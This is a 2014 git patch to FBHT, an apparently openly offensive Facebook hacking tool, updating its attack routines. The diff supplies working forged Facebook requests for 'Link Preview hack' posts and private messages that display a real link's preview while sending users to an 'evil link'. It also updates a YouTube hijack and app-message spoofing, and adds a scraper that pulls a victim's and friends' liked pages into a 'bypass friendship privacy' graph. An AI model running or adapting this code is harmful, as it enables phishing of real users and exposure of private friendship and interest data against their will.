From 82887bfd46914518a6a577df73a57515f078aee7 Mon Sep 17 00:00:00 2001 From: chinoogawa Date: Fri, 14 Mar 2014 01:49:18 -0300 Subject: [PATCH] Facebook has made a series of changes that compromised the functionallity of FBHT. (UN)fortunately, they didn't patch any of the vulnerbilities except "Like Flood" and Create Test Users (Massive, you can create 3 or 4 without a problem). They didn't accept the bug for the massive test's account creation, so bad! but they fixed it just in case. Crossed reference between nodes in graphs --- MyParser.py | 10 +- main.py | 82 +++++++---- mainFunc.py | 412 +++++++++++++++++++++++++--------------------------- 3 files changed, 259 insertions(+), 245 deletions(-) diff --git a/MyParser.py b/MyParser.py index d4c52f2..24b5732 100644 --- a/MyParser.py +++ b/MyParser.py @@ -24,6 +24,8 @@ def parseData(dataRaw): for data in dataRaw: + if data=="": + continue text = data.strip("for (;;);") json_dump = json.loads(text) try: @@ -33,16 +35,16 @@ def parseData(dataRaw): print 'Error in json dump or parser.feed' for i in range(len(parser.dataArray)): - if parser.dataArray[i] == 'Name:': + if parser.dataArray[i] == 'Name': names.append(parser.dataArray[i+1]) continue - if parser.dataArray[i] == 'User ID:': + if parser.dataArray[i] == 'User ID': userIds.append(parser.dataArray[i+1]) continue - if parser.dataArray[i] == 'Login email:': + if parser.dataArray[i] == 'Login email': emails.append(parser.dataArray[i+1]+'@'+parser.dataArray[i+2]) continue - if parser.dataArray[i] == 'Login password:': + if parser.dataArray[i] == 'Login password': passwords.append(parser.dataArray[i+1]) continue diff --git a/main.py b/main.py index 1e4c044..23af29e 100644 --- a/main.py +++ b/main.py @@ -9,6 +9,9 @@ globalEmail = '' globalPassword = '' +privacy = {'0':'80','1':'40','2':'10'} +privacySet = ['0','1','2'] + def main(): global globalLogin @@ -28,7 +31,7 @@ def main(): print ' \ \ / // / | | | | ' print ' \ V // /_ | |_| | ' print ' \_/|____(_\___/ ' - + print ' _ _ ' print ' ____ | | (_) ' print ' / __ \ ___| |__ _ _ __ ___ ___ __ _ __ ___ ____ _ ' @@ -40,8 +43,7 @@ def main(): print '\n\n\n\n\n\n' raw_input('Enjoy it :D . Press enter to get started') - - + while 1: option = -1 while ((int(option) != 1) and (int(option) != 2) and @@ -66,7 +68,7 @@ def main(): print '7) Link Preview hack (Youtube version)\n' print '8) Youtube hijack\n' print '9) Private message, Link Preview hack (Simple web version)\n' - print '10) Private message, Link Preview hack (Youtube version)\n' + print '10) Private message, Link Preview hack (Youtube version)\n' print '11) Like flood\n' print '12) Publish a post as an App (App Message Spoof)\n' print '13) Bypass friendship privacy\n' @@ -151,13 +153,17 @@ def main(): password = globalPassword if (login(email,password,'real'))!= -1: - summary = raw_input('Insert a summary for the link: ') - link = raw_input('Insert de evil link: ') - realLink = raw_input('Insert de real link: ') - title = raw_input('Insert a title for the link: ') - image = raw_input('Insert the image url for the post: ') - comment = raw_input('Insert a comment for the post associated: ') - linkPreview(link,realLink,title,summary,comment,image) + option = raw_input("Insert option for privacy 0:Public 1:Friends 2:Only Me : ") + if option in privacySet: + summary = raw_input('Insert a summary for the link: ') + link = raw_input('Insert de evil link: ') + realLink = raw_input('Insert de real link: ') + title = raw_input('Insert a title for the link: ') + image = raw_input('Insert the image url for the post: ') + comment = raw_input('Insert a comment for the post associated: ') + linkPreview(link,realLink,title,summary,comment,image, privacy[option]) + else: + print "Wrong privacy value, try again " if (int(option) == 7): @@ -169,13 +175,17 @@ def main(): password = globalPassword if (login(email,password,'real'))!= -1: - summary = raw_input('Insert a summary for the video: ') - link = raw_input('Insert de evil link: ') - videoLink = raw_input('Insert de youtube link: ') - title = raw_input('Insert a title for the video: ') - videoID = raw_input('Insert the video ID (w?=): ') - comment = raw_input('Insert a comment for the post associated to the video: ') - linkPreviewYoutube(link,videoLink,title,summary,comment,videoID) + option = raw_input("Insert option for privacy 0:Public 1:Friends 2:Only Me : ") + if option in privacySet: + summary = raw_input('Insert a summary for the video: ') + link = raw_input('Insert de evil link: ') + videoLink = raw_input('Insert de youtube link: ') + title = raw_input('Insert a title for the video: ') + videoID = raw_input('Insert the video ID (w?=): ') + comment = raw_input('Insert a comment for the post associated to the video: ') + linkPreviewYoutube(link,videoLink,title,summary,comment,videoID,privacy[option]) + else: + print "Wrong privacy value, try again " if (int(option) == 8): signal.signal(signal.SIGINT, signal_handler) @@ -187,13 +197,17 @@ def main(): password = globalPassword if (login(email,password,'real'))!= -1: - summary = raw_input('Insert a summary for the video: ') - videoLink = raw_input('Insert de youtube link: ') - title = raw_input('Insert a title for the video: ') - videoID = raw_input('Insert the video ID (watch?v=): ') - comment = raw_input('Insert a comment for the post associated to the video: ') - hijackedVideo = raw_input('Insert the ID for the hijacked video (watch?v=): ') - hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo) + option = raw_input("Insert option for privacy 0:Public 1:Friends 2:Only Me : ") + if option in privacySet: + summary = raw_input('Insert a summary for the video: ') + videoLink = raw_input('Insert de youtube link: ') + title = raw_input('Insert a title for the video: ') + videoID = raw_input('Insert the video ID (watch?v=): ') + comment = raw_input('Insert a comment for the post associated to the video: ') + hijackedVideo = raw_input('Insert the ID for the hijacked video (watch?v=): ') + hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo) + else: + print "Wrong privacy value, try again " if (int(option) == 9): signal.signal(signal.SIGINT, signal_handler) @@ -314,12 +328,20 @@ def main(): if (int(option) == 15): - analize = int(raw_input('Analyze an existing one, or a new one? (0|1): ')) - victim = raw_input('Insert the victim username or userId: ') - if (analize == 1): - analyzeGraph(victim) + + if (globalLogin == False): + email,password = setMail() else: - reAnalyzeGraph(victim) + email = globalEmail + password = globalPassword + + if (login(email,password,'real'))!= -1: + analize = int(raw_input('Analyze an existing one, or a new one? (0|1): ')) + victim = raw_input('Insert the victim username or userId: ') + if (analize == 1): + analyzeGraph(victim) + else: + reAnalyzeGraph(victim) if (int(option) == 16): fileName = raw_input('Insert the victim username: ') diff --git a/mainFunc.py b/mainFunc.py index e68dcf5..e3cb6ae 100644 --- a/mainFunc.py +++ b/mainFunc.py @@ -4,7 +4,7 @@ from urllib import urlencode import simplejson as json import database -from time import time,ctime +from time import time,ctime,sleep import pickle import re from handlers import * @@ -161,7 +161,7 @@ def createUser(number): percentage = (i * 100.0) / int(number) print '\rCompleted [%.2f%%]\r'%percentage, - + sleep(60) except mechanize.HTTPError as e: logs(str(e.code) + ' on iteration ' + str(i)) print str(e.code) + ' on iteration %d'%i @@ -575,19 +575,22 @@ def appMessageSpoof(appId,link,picture,title,domain,description,comment): except: logs('Error en el modulo de appMessageSpoof()') print 'Error en el modulo de appMessageSpoof()\n' + -def linkPreviewYoutube(link,videoLink,title,summary,comment,videoID): +def linkPreviewYoutube(link,videoLink,title,summary,comment,videoID, privacy): c_user = getC_user() print str(c_user)+'\n' try: set_dtsg() arguments = { 'fb_dtsg' : br.form['fb_dtsg'], - 'xhpc_context' : 'home', + 'composer_session_id' : '38c20e73-acfc-411a-8313-47c095b01e42', + 'xhpc_context' : 'profile', 'xhpc_ismeta' : '1', - 'xhpc_timeline' : '', - 'xhpc_composerid' : 'u_jsonp_5_0', + 'xhpc_timeline' : '1', + 'xhpc_composerid' : 'u_0_29', 'xhpc_targetid' : str(c_user), + 'clp' : '{ cl_impid : 65ac6257 , clearcounter :0, elementid : u_0_2n , version : x , parent_fbid :'+str(c_user)+'}', 'xhpc_message_text' : str(comment), 'xhpc_message' : str(comment), 'aktion' : 'post', @@ -602,15 +605,15 @@ def linkPreviewYoutube(link,videoLink,title,summary,comment,videoID): 'attachment[params][medium]' : '103', 'attachment[params][url]' : str(videoLink), 'attachment[params][video][0][type]' : 'application/x-shockwave-flash', - 'attachment[params][video][0][src]' : 'http://www.youtube.com/v/'+str(videoID)+'?version=3&autohide=1&autoplay=1', - 'attachment[params][video][0][width]' : '1920', - 'attachment[params][video][0][height]' : '1080', + 'attachment[params][video][0][src]' : 'http://www.youtube.com/v/FxyecjOQXnI?autohide=1&version=3&autoplay=1', + 'attachment[params][video][0][width]' : '1280', + 'attachment[params][video][0][height]' : '720', 'attachment[params][video][0][safe]' : '1', 'attachment[type]' : '100', 'link_metrics[source]' : 'ShareStageExternal', 'link_metrics[domain]' : 'www.youtube.com', 'link_metrics[base_domain]' : 'youtube.com', - 'link_metrics[title_len]' : '54', + 'link_metrics[title_len]' : '92', 'link_metrics[summary_len]' : '160', 'link_metrics[min_dimensions][0]' : '70', 'link_metrics[min_dimensions][1]' : '70', @@ -623,41 +626,73 @@ def linkPreviewYoutube(link,videoLink,title,summary,comment,videoID): 'link_metrics[images_considered]' : '1', 'link_metrics[images_cap]' : '10', 'link_metrics[images_type]' : 'images_array', - 'composer_metrics[best_image_w]' : '100', - 'composer_metrics[best_image_h]' : '100', + 'composer_metrics[best_image_w]' : '398', + 'composer_metrics[best_image_h]' : '208', 'composer_metrics[image_selected]' : '0', 'composer_metrics[images_provided]' : '1', 'composer_metrics[images_loaded]' : '1', 'composer_metrics[images_shown]' : '1', - 'composer_metrics[load_duration]' : '515', + 'composer_metrics[load_duration]' : '1058', 'composer_metrics[timed_out]' : '0', 'composer_metrics[sort_order]' : '', 'composer_metrics[selector_type]' : 'UIThumbPager_6', + 'backdated_date[year]' : '', + 'backdated_date[month]' : '', + 'backdated_date[day]' : '', + 'backdated_date[hour]' : '', + 'backdated_date[minute]' : '', 'is_explicit_place' : '', + 'composertags_place' : '', + 'composertags_place_name' : '', + 'tagger_session_id' : '1394761251', + 'action_type_id[0]' : '', + 'object_str[0]' : '', + 'object_id[0]' : '', + 'og_location_id[0]' : '', + 'hide_object_attachment' : '0', + 'og_suggestion_mechanism' : '', + 'composertags_city' : '', + 'disable_location_sharing' : 'false', + 'composer_predicted_city' : '', + 'audience[0][value]' : privacy, + 'nctr[_mod]' : 'pagelet_timeline_recent', + '__user' : str(c_user), + '__a' : '1', + '__dyn' : '7n8aqEAMBlCFUSt2u6aOGeExEW9ACxO4pbGA8AGGzCAjFDxCm', + '__req' : 'm', + 'ttstamp' : '26581658074898653', + '__rev' : '1161243', } datos = urlencode(arguments) - response = br.open('https://www.facebook.com/ajax/profile/composer.php',datos) + response = br.open('https://www.facebook.com/ajax/updatestatus.php',datos) if globalLogging: logs(response.read()) - + + except mechanize.HTTPError as e: + print e.code + + except mechanize.URLError as e: + print e.reason.args except: logs('Error en el modulo de linkPreviewYoutube()') print 'Error en el modulo de linkPreviewYoutube()\n' -def linkPreview(link,realLink,title,summary,comment,image): +def linkPreview(link,realLink,title,summary,comment,image,privacy): c_user = getC_user() print str(c_user)+'\n' try: set_dtsg() arguments = { + 'composer_session_id' : '787d2fec-b5c1-41fe-bbda-3450a03240c6', 'fb_dtsg' : br.form['fb_dtsg'], 'xhpc_context' : 'profile', 'xhpc_ismeta' : '1', 'xhpc_timeline' : '1', - 'xhpc_composerid' : 'u_jsonp_2_c', + 'xhpc_composerid' : 'u_0_29', 'xhpc_targetid' : str(c_user), + 'clp' : '{"cl_impid":"27c5e963","clearcounter":0,"elementid":"u_0_2n","version":"x","parent_fbid":'+str(c_user)+'}', 'xhpc_message_text' : str(comment), 'xhpc_message' : str(comment), 'aktion' : 'post', @@ -675,17 +710,17 @@ def linkPreview(link,realLink,title,summary,comment,image): 'link_metrics[source]' : 'ShareStageExternal', 'link_metrics[domain]' : str(realLink), 'link_metrics[base_domain]' : str(realLink), - 'link_metrics[title_len]' : '33', - 'link_metrics[summary_len]' : '108', + 'link_metrics[title_len]' : '38', + 'link_metrics[summary_len]' : '38', 'link_metrics[min_dimensions][0]' : '70', 'link_metrics[min_dimensions][1]' : '70', - 'link_metrics[images_with_dimensions]' : '1', + 'link_metrics[images_with_dimensions]' : '3', 'link_metrics[images_pending]' : '0', 'link_metrics[images_fetched]' : '0', - 'link_metrics[image_dimensions][0]' : '200', - 'link_metrics[image_dimensions][1]' : '200', + 'link_metrics[image_dimensions][0]' : '322', + 'link_metrics[image_dimensions][1]' : '70', 'link_metrics[images_selected]' : '1', - 'link_metrics[images_considered]' : '1', + 'link_metrics[images_considered]' : '5', 'link_metrics[images_cap]' : '3', 'link_metrics[images_type]' : 'ranked', 'composer_metrics[best_image_w]' : '100', @@ -694,7 +729,7 @@ def linkPreview(link,realLink,title,summary,comment,image): 'composer_metrics[images_provided]' : '1', 'composer_metrics[images_loaded]' : '1', 'composer_metrics[images_shown]' : '1', - 'composer_metrics[load_duration]' : '299', + 'composer_metrics[load_duration]' : '812', 'composer_metrics[timed_out]' : '0', 'composer_metrics[sort_order]' : '', 'composer_metrics[selector_type]' : 'UIThumbPager_6', @@ -706,41 +741,54 @@ def linkPreview(link,realLink,title,summary,comment,image): 'is_explicit_place' : '', 'composertags_place' : '', 'composertags_place_name' : '', - 'composer_session_id' : '1371889360', + 'tagger_session_id' : '1394765332', + 'action_type_id[0]' : '', + 'object_str[0]' : '', + 'object_id[0]' : '', + 'og_location_id[0]' : '', + 'hide_object_attachment' : '0', + 'og_suggestion_mechanism' : '', 'composertags_city' : '', 'disable_location_sharing' : 'false', - 'composer_predicted_city' : '106423786059675', - 'audience[0][value]' : '10', + 'composer_predicted_city' : '', + 'audience[0][value]' : privacy, 'nctr[_mod]' : 'pagelet_timeline_recent', '__user' : str(c_user), '__a' : '1', - '__dyn' : '7n8ahyj2qmpnDzk9UmAEXw', - '__req' : '9', - 'phstamp' : '16581659510745851082338' + '__dyn' : '7n8aqEAMBlCFUSt2u6aOGeExEW9ACxO4pbGA8AGGzCAjFDxCm', + '__req' : 'h', + 'ttstamp' : '26581658074898653', + '__rev' : '1161243' } datos = urlencode(arguments) - response = br.open('https://www.facebook.com/ajax/profile/composer.php',datos) + response = br.open('https://www.facebook.com/ajax/updatestatus.php',datos) if globalLogging: logs(response.read()) - + + except mechanize.HTTPError as e: + print e.code + except mechanize.URLError as e: + print e.reason.args + except: logs('Error en el modulo de linkPreview()') print 'Error en el modulo de linkPreview()\n' -def hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo): +def hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo,privacy): c_user = getC_user() print str(c_user)+'\n' try: set_dtsg() arguments = { - 'fb_dtsg' : br.form['fb_dtsg'], - 'xhpc_context' : 'home', + 'composer_session_id' : '38c20e73-acfc-411a-8313-47c095b01e42', + 'xhpc_context' : 'profile', 'xhpc_ismeta' : '1', - 'xhpc_timeline' : '', - 'xhpc_composerid' : 'u_jsonp_5_0', + 'xhpc_timeline' : '1', + 'xhpc_composerid' : 'u_0_29', 'xhpc_targetid' : str(c_user), + 'clp' : '{ cl_impid : 65ac6257 , clearcounter :0, elementid : u_0_2n , version : x , parent_fbid :'+str(c_user)+'}', 'xhpc_message_text' : str(comment), 'xhpc_message' : str(comment), 'aktion' : 'post', @@ -763,7 +811,7 @@ def hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo): 'link_metrics[source]' : 'ShareStageExternal', 'link_metrics[domain]' : 'www.youtube.com', 'link_metrics[base_domain]' : 'youtube.com', - 'link_metrics[title_len]' : '54', + 'link_metrics[title_len]' : '92', 'link_metrics[summary_len]' : '160', 'link_metrics[min_dimensions][0]' : '70', 'link_metrics[min_dimensions][1]' : '70', @@ -776,17 +824,44 @@ def hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo): 'link_metrics[images_considered]' : '1', 'link_metrics[images_cap]' : '10', 'link_metrics[images_type]' : 'images_array', - 'composer_metrics[best_image_w]' : '100', - 'composer_metrics[best_image_h]' : '100', + 'composer_metrics[best_image_w]' : '398', + 'composer_metrics[best_image_h]' : '208', 'composer_metrics[image_selected]' : '0', 'composer_metrics[images_provided]' : '1', 'composer_metrics[images_loaded]' : '1', 'composer_metrics[images_shown]' : '1', - 'composer_metrics[load_duration]' : '515', + 'composer_metrics[load_duration]' : '1058', 'composer_metrics[timed_out]' : '0', 'composer_metrics[sort_order]' : '', 'composer_metrics[selector_type]' : 'UIThumbPager_6', + 'backdated_date[year]' : '', + 'backdated_date[month]' : '', + 'backdated_date[day]' : '', + 'backdated_date[hour]' : '', + 'backdated_date[minute]' : '', 'is_explicit_place' : '', + 'composertags_place' : '', + 'composertags_place_name' : '', + 'tagger_session_id' : '1394761251', + 'action_type_id[0]' : '', + 'object_str[0]' : '', + 'object_id[0]' : '', + 'og_location_id[0]' : '', + 'hide_object_attachment' : '0', + 'og_suggestion_mechanism' : '', + 'composertags_city' : '', + 'disable_location_sharing' : 'false', + 'composer_predicted_city' : '', + 'audience[0][value]' : privacy, + 'nctr[_mod]' : 'pagelet_timeline_recent', + 'is_explicit_place' : '', + 'nctr[_mod]' : 'pagelet_timeline_recent', + '__user' : str(c_user), + '__a' : '1', + '__dyn' : '7n8aqEAMBlCFUSt2u6aOGeExEW9ACxO4pbGA8AGGzCAjFDxCm', + '__req' : 'm', + 'ttstamp' : '26581658074898653', + '__rev' : '1161243', } datos = urlencode(arguments) @@ -868,15 +943,14 @@ def privateMessageLink(message,victim,subject,realLink,title,summary,imageLink,e try: set_dtsg() arguments = { - 'w' : '398', 'message_batch[0][action_type]' : 'ma-type:user-generated-message', 'message_batch[0][thread_id]' : '', 'message_batch[0][author]' : 'fbid:'+c_user, 'message_batch[0][author_email]' : '', 'message_batch[0][coordinates]' : '', - 'message_batch[0][timestamp]' : '1387237764222', + 'message_batch[0][timestamp]' : '1394766424499', 'message_batch[0][timestamp_absolute]' : 'Today', - 'message_batch[0][timestamp_relative]' : '8:49pm', + 'message_batch[0][timestamp_relative]' : '12:07am', 'message_batch[0][timestamp_time_passed]' : '0', 'message_batch[0][is_unread]' : 'false', 'message_batch[0][is_cleared]' : 'false', @@ -888,62 +962,60 @@ def privateMessageLink(message,victim,subject,realLink,title,summary,imageLink,e 'message_batch[0][has_attachment]' : 'true', 'message_batch[0][html_body]' : 'false', 'message_batch[0][specific_to_list][0]' : 'fbid:' + victim, - 'message_batch[0][force_sms]' : 'true', - 'message_batch[0][ui_push_phase]' : 'V3', 'message_batch[0][content_attachment][subject]' : subject, 'message_batch[0][content_attachment][app_id]' : '2309869772', 'message_batch[0][content_attachment][attachment][params][urlInfo][canonical]' : realLink, 'message_batch[0][content_attachment][attachment][params][urlInfo][final]' : realLink, 'message_batch[0][content_attachment][attachment][params][urlInfo][user]' : evilLink, - 'message_batch[0][content_attachment][attachment][params][favicon]' : 'http://www.whatever.com/favicon.ico', + 'message_batch[0][content_attachment][attachment][params][favicon]' : realLink+'/favicon.ico', 'message_batch[0][content_attachment][attachment][params][title]' : title, 'message_batch[0][content_attachment][attachment][params][summary]' : summary, 'message_batch[0][content_attachment][attachment][params][images][0]' : imageLink, - 'h' : '208', - 'url' : imageLink, - 'cfs' : '1', 'message_batch[0][content_attachment][attachment][params][medium]' : '106', 'message_batch[0][content_attachment][attachment][params][url]' : realLink, 'message_batch[0][content_attachment][attachment][type]' : '100', 'message_batch[0][content_attachment][link_metrics][source]' : 'ShareStageExternal', - 'message_batch[0][content_attachment][link_metrics][domain]' : 'www.mkit.com.ar', - 'message_batch[0][content_attachment][link_metrics][base_domain]' : 'mkit.com.ar', + 'message_batch[0][content_attachment][link_metrics][domain]' : realLink.strip('https://').strip('/'), + 'message_batch[0][content_attachment][link_metrics][base_domain]' : realLink.strip('https://www.').strip('/'), 'message_batch[0][content_attachment][link_metrics][title_len]' : '38', - 'message_batch[0][content_attachment][link_metrics][summary_len]' : '180', + 'message_batch[0][content_attachment][link_metrics][summary_len]' : '38', 'message_batch[0][content_attachment][link_metrics][min_dimensions][0]' : '70', 'message_batch[0][content_attachment][link_metrics][min_dimensions][1]' : '70', 'message_batch[0][content_attachment][link_metrics][images_with_dimensions]' : '3', 'message_batch[0][content_attachment][link_metrics][images_pending]' : '0', 'message_batch[0][content_attachment][link_metrics][images_fetched]' : '0', - 'message_batch[0][content_attachment][link_metrics][image_dimensions][0]' : '856', - 'message_batch[0][content_attachment][link_metrics][image_dimensions][1]' : '566', - 'message_batch[0][content_attachment][link_metrics][images_selected]' : '3', + 'message_batch[0][content_attachment][link_metrics][image_dimensions][0]' : '322', + 'message_batch[0][content_attachment][link_metrics][image_dimensions][1]' : '70', + 'message_batch[0][content_attachment][link_metrics][images_selected]' : '1', 'message_batch[0][content_attachment][link_metrics][images_considered]' : '5', 'message_batch[0][content_attachment][link_metrics][images_cap]' : '3', 'message_batch[0][content_attachment][link_metrics][images_type]' : 'ranked', - 'message_batch[0][content_attachment][composer_metrics][best_image_w]' : '398', - 'message_batch[0][content_attachment][composer_metrics][best_image_h]' : '208', + 'message_batch[0][content_attachment][composer_metrics][best_image_w]' : '100', + 'message_batch[0][content_attachment][composer_metrics][best_image_h]' : '100', 'message_batch[0][content_attachment][composer_metrics][image_selected]' : '0', - 'message_batch[0][content_attachment][composer_metrics][images_provided]' : '3', - 'message_batch[0][content_attachment][composer_metrics][images_loaded]' : '3', - 'message_batch[0][content_attachment][composer_metrics][images_shown]' : '3', - 'message_batch[0][content_attachment][composer_metrics][load_duration]' : '0', + 'message_batch[0][content_attachment][composer_metrics][images_provided]' : '1', + 'message_batch[0][content_attachment][composer_metrics][images_loaded]' : '1', + 'message_batch[0][content_attachment][composer_metrics][images_shown]' : '1', + 'message_batch[0][content_attachment][composer_metrics][load_duration]' : '6', 'message_batch[0][content_attachment][composer_metrics][timed_out]' : '0', 'message_batch[0][content_attachment][composer_metrics][sort_order]' : '', 'message_batch[0][content_attachment][composer_metrics][selector_type]' : 'UIThumbPager_6', + 'message_batch[0][force_sms]' : 'true', + 'message_batch[0][ui_push_phase]' : 'V3', 'message_batch[0][status]' : '0', - 'message_batch[0][message_id]' : '<1387237764222:1517510061-619853692@mail.projektitan.com>', - 'client' : 'mercury', + 'message_batch[0][message_id]' : '<1394766424499:3126670212-4125121119@mail.projektitan.com>', + 'message_batch[0][client_thread_id]' : 'user:'+str(c_user), + 'client' : 'web_messenger', '__user' : c_user, '__a' : '1', - '__dyn' : '7n8a9EAMNpGvyVQ9UmWOGUGy6zECQqbx2mbAKGiCw', - '__req' : 'f', + '__dyn' : '7n8a9EAMBlCFYwyt2u6aOGeExEW9J6yUgByVbGAF4iGGeqheCu6po', + '__req' : '1n', 'fb_dtsg' : br.form['fb_dtsg'], - '__rev' : '1048858', - 'ttstamp' : '265816888106986872', + 'ttstamp' : '26581658074898653', + '__rev' : '1161243' } datos = urlencode(arguments) - response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php ',datos) + response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php',datos) if globalLogging: logs(response.read()) @@ -1118,146 +1190,6 @@ def getName(userId): print e.reason.args return str(userId) -''' -def bypassFriendshipPrivacyPlot(victim, transitive,fileName): - import networkx as nx - import matplotlib.pyplot as plt - import numpy as np - - coleccion = {} - - myGraph = nx.Graph() - victima = getName(victim) - myGraph.add_node(victima) - - - #Percentage container - percentage = 0.0 - #Disclosude friends container - friendships = [] - #Already visited nodes container - visited = [] - try: - #If the file already exists - friendshipFile = open('dumps\\'+fileName,"rb") - #Reads every line of the file - while True: - linea = friendshipFile.readline() - if not linea: - break - #Store in the visited array for non repetition - visited.append(linea.strip("\n\r")) - - friendshipFile.close() - - except: - #If the file does not exists, creates the file - friendshipFile = open('dumps\\'+fileName,"wb") - friendshipFile.close() - - - try: - #Generates the first level of the search - result = coreFriendshipPrivacy(victim,transitive) - except: - print 'Check the internet connection please..' - return - - #Stores non repetitive values in the disclosed friends container - for individuos in result: - if individuos not in visited: - if coleccion.has_key(individuos) == False: - nodo = getName(individuos) - coleccion[individuos] = nodo - else: - nodo = coleccion[individuos] - - if coleccion.has_key(transitive) == False: - transitivo = getName(transitive) - coleccion[transitive] = transitivo - else: - transitivo = coleccion[transitive] - - myGraph.add_node(nodo) - myGraph.add_edge(nodo,transitivo) - friendships.append(individuos) - - #Counter for percentage calculus purpose - i = 0.0 - #For every value in the first disclosed list, repeats until every value has been tryed - for friends in friendships: - #Percentage calculus - percentage = (i * 100.0)/len(friendships) - print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,len(friendships), percentage), - i+=1 - #Only if the node wasn't visited - if friends not in visited: - #if coreFriendshipPrivacy() fails, an exception is caught. Therefore, state wis still being True. - #Only if the try passes, the infinite while will end. (For internet error connection problem) - state = True - while state == True: - try: - result = coreFriendshipPrivacy(victim,friends) - state = False - except signalCaught as e: - state = False - print 'Signal Caught handler' - print '%s ' %e.args[0] - return - except: - print '\rCheck the internet connection please..\r' - - #Stores non repetitive values in the disclosed friends container - for element in result: - if element not in friendships: - if coleccion.has_key(friends) == False: - nodo = getName(friends) - coleccion[friends] = nodo - else: - nodo = coleccion[friends] - - if coleccion.has_key(element) == False: - transitivo = getName(element) - coleccion[element] = transitivo - else: - transitivo = coleccion[element] - - myGraph.add_node(nodo) - myGraph.add_edge(nodo,transitivo) - friendships.append(element) - - #Stores every single value of friendships list alredy analyzed for non repetitivness - visited.append(friends) - - #Check if the file exists, if true append, else create and writes - try: - friendshipFile = open('dumps\\'+fileName,"ab") - except: - friendshipFile = open('dumps\\'+fileName,"wb") - - #Stores every userID for further analyzis - for friends in friendships: - if coleccion.has_key(friends) == False: - transitivo = getName(friends) - coleccion[friends] = transitivo - else: - transitivo = coleccion[friends] - - myGraph.add_edge(victima,transitivo) - friendshipFile.write(str(friends)+'\n') - - friendshipFile.close() - nx.draw_spring(myGraph,node_color = np.linspace(0,1,len(myGraph.nodes())),edge_color = np.linspace(0,1,len(myGraph.edges())) ,with_labels=False) - plt.savefig("graph_color.pdf") - plt.savefig("graph_color.png") - plt.show() - - nx.draw_spring(myGraph,node_color = np.linspace(0,1,len(myGraph.nodes())),edge_color = '#000000' ,with_labels=False) - plt.savefig("graph_ByW.pdf") - plt.savefig("graph_ByW.png") - plt.show() - -''' def mkdir(directory,root): import os @@ -1339,6 +1271,7 @@ def analyzeGraph(victim): edgesValues = {} nodekeys = {} userNames = [] + commonPages = {} A,idkeys = loadObjects(victim) if A != []: @@ -1359,6 +1292,7 @@ def analyzeGraph(victim): print 'Attemping to get user\'s information' for elements in idkeys.keys(): user = getName(elements) + commonPages[user] = corePagesLike(victim,elements) userNames.append(user) nodekeys[idkeys[elements]] = user percentage = (i * 100.0)/len(idkeys.keys()) @@ -1401,7 +1335,7 @@ def analyzeGraph(victim): labelGraph = nx.Graph() for label in labelNodes: - labelGraph.add_node(nodekeys[int(label)]) + labelGraph.add_node(nodekeys[int(label)],likes=commonPages[nodekeys[int(label)]]) for labelE in labelEdges: labelGraph.add_edge(nodekeys[int(labelE[0])],nodekeys[int(labelE[1])]) @@ -1617,7 +1551,8 @@ def bypassFriendshipPrivacyPlot(victim, transitive): plt.savefig(root+'\\'+directory+'\\'+victim+"graph_color.png") write_dot(myGraph,root+'\\'+directory+'\\'+victim+"graph_color.dot") plt.show() - + + def bypassFriendshipPrivacy(victim, transitive): #Percentage container @@ -1706,6 +1641,61 @@ def bypassFriendshipPrivacy(victim, transitive): friendshipFile.close() +def corePagesLike(victim,transitive): + matchs = [] + begin = 0 + page = [] + + try: + response = br.open('https://www.facebook.com/'+str(victim)+'?and='+str(transitive)+'&sk=favorites') + resultado = response.read() + match = re.search('timelineFriendsColumnHeader',resultado) + if match is not None: + linea = re.search('timelineFriendsColumnHeader(.+)',resultado).group() + + except mechanize.HTTPError as e: + print e.code + #Should handle a custom error + raise + except mechanize.URLError as e: + print e.reason.args + #Should handle a custom error + raise + #Error connection the upper function will catch the exception + except: + raise + + while True: + match = re.search('fbStreamTimelineFavInfoContainer',resultado[begin:]) + if match != None: + matchEnd = re.search('\n',resultado[begin+match.start():]) + if matchEnd != None: + matchs.append(resultado[begin+match.start():matchEnd.end()+begin+match.start()]) + begin = matchEnd.end()+begin+match.start() + match = None + matchEnd = None + else: + break + + + for linea in matchs: + start = 0 + try: + #Search the string to get the position of the starting match + matchAnd = re.search('page\.php\?id=',linea[start:]) + #Search the end of the match for taking the id length + matchEnd = re.search('">',linea[start+matchAnd.end():]) + #If we have a start and an end, we have the id value + except: + print 'ERROR' + + + if (matchAnd and matchEnd) is not None: + #Appends the value given the proper position (resolved a few lines up) + page.append(linea[start+matchAnd.end():start+matchEnd.start()+matchAnd.end() ]) + #Moves the pointer for next match + start += matchEnd.start()+matchAnd.end() + return page def coreFriendshipPrivacy(victim,transitive): friends = []